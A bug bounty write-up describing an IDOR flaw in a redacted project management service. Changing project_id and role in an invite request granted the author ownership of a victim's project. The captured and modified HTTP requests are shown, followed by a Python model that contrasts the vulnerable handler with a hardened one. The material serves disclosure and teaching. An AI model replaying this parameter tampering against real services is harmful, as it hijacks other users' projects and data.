IDOR Leads To Project Takeover

It's all about Changes

Hi Guys,

This is my second bug bounty write-up, on how I managed to take over a victim's project using a collaboration invite.

redacted.com runs an online project management service where people can post comments, images, files, etc. of their work on a single project. The admin of a project can add users as collaborators of that project.

The collaboration invite request looked like this:

POST /project_api/project_invitation HTTP/1.1
Host: redacted.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://redacted.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 121
Connection: close

x_token=748f5bba976e3a202a7dbfa939271cde11e260fa52b7bbe4f3a024d80d08df92&project_id=5401234&role=1&emails=test%40test.com

And when I saw the request I thought... what if I

So we have three request parameters:

project_id=
role=
emails=

I changed the request to:

project_id= the victim's project ID
role=0 (0=Owner, 1=Editor)
emails= my email

I forwarded the request and...

Checked my inbox and there it was... a collaboration invite to the victim's project as an owner. I was able to edit, delete, add more users, remove the original owner of the project, etc.
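To make the server-side mistake concrete, here is an added example written for this post, not redacted.com's code: a Python model of the invite endpoint with the flawed handler beside a hardened one. The flawed handler trusts project_id and role exactly as submitted, so the only thing an attacker needs is a guessable project ID; the hardened one checks that the authenticated requester is an owner of that specific project, rejects roles outside a server-side allow-list, and keeps owner grants out of the invite flow. The emails, the second project ID, the comma-separated emails format and the "invites never grant owner" rule are assumptions; the x_token field is parsed but deliberately plays no part in authorization, which must come from the session.

```python
"""Model of the project_invitation endpoint from the write-up: the vulnerable
handler beside a hardened one. Constructed example, not redacted.com's code;
identities, the second project ID and the emails are made up."""

from dataclasses import dataclass, field
from urllib.parse import parse_qs

ROLE_OWNER = 0   # role=0 gave full control in the write-up
ROLE_EDITOR = 1
ALLOWED_ROLES = {ROLE_OWNER, ROLE_EDITOR}


@dataclass
class Project:
    project_id: int
    members: dict = field(default_factory=dict)  # email -> role


class Forbidden(Exception):
    pass


def make_projects():
    """Constructed state: the victim owns 5401234 (the ID from the captured
    request); the attacker owns an unrelated project of their own."""
    return {
        5401234: Project(5401234, {"victim@example.com": ROLE_OWNER}),
        5409999: Project(5409999, {"attacker@example.com": ROLE_OWNER}),
    }


def parse_invite(raw_body):
    """Parse the x-www-form-urlencoded body into (project_id, role, emails).
    Assumes 'emails' may be comma-separated. x_token is read by parse_qs but
    ignored: a body field is never the basis for authorization."""
    form = parse_qs(raw_body, strict_parsing=True)
    project_id = int(form["project_id"][0])
    role = int(form["role"][0])
    emails = [e.strip().lower() for e in form["emails"][0].split(",") if e.strip()]
    return project_id, role, emails


def invite_vulnerable(projects, requester, raw_body):
    """The flaw: every field is trusted. The only implicit check is that a
    project with that ID exists, so any logged-in user can add themselves
    as owner of any project whose ID they can guess."""
    project_id, role, emails = parse_invite(raw_body)
    project = projects[project_id]
    for email in emails:
        project.members[email] = role
    return emails


def invite_secure(projects, requester, raw_body):
    """Hardened: the operation is bound to the requester's rights on *that*
    project, and the role comes from a server-side allow-list."""
    project_id, role, emails = parse_invite(raw_body)
    project = projects.get(project_id)
    # One error for both "no such project" and "not yours", so the endpoint
    # does not confirm which IDs exist.
    if project is None or project.members.get(requester) != ROLE_OWNER:
        raise Forbidden("requester is not an owner of this project")
    if role not in ALLOWED_ROLES:
        raise ValueError("unknown role %r" % role)
    # Design choice (assumption): ownership changes go through a separate,
    # explicit flow; an invite grants editor at most.
    if role == ROLE_OWNER:
        raise Forbidden("use the ownership-transfer flow to add an owner")
    for email in emails:
        project.members[email] = role
    return emails


# The attacker's modified request body: victim's project_id, role=0,
# attacker's own address. Token copied from the captured request.
ATTACK_BODY = ("x_token=748f5bba976e3a202a7dbfa939271cde11e260fa52b7bbe4f3a024d80d08df92"
               "&project_id=5401234&role=0&emails=attacker%40example.com")


def demo():
    """Replay the attack against both handlers.
    Returns (attacker became owner under the flawed handler,
             attacker was kept out under the hardened handler)."""
    attacker = "attacker@example.com"
    vulnerable = make_projects()
    invite_vulnerable(vulnerable, attacker, ATTACK_BODY)
    hijacked = vulnerable[5401234].members.get(attacker) == ROLE_OWNER

    secure = make_projects()
    try:
        invite_secure(secure, attacker, ATTACK_BODY)
        blocked = False
    except Forbidden:
        blocked = attacker not in secure[5401234].members
    return hijacked, blocked


if __name__ == "__main__":
    print(demo())  # (True, True)
```

The check that matters is the one on project.members.get(requester): the server must decide from its own records whether the caller may administer the project named in the request, rather than accepting that the request came from a logged-in user. Validating role against an allow-list is secondary; without the ownership check it would only limit the damage to editor access on someone else's project.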

And I was like

I immediately reported the bug and received a good 3-digit bounty :)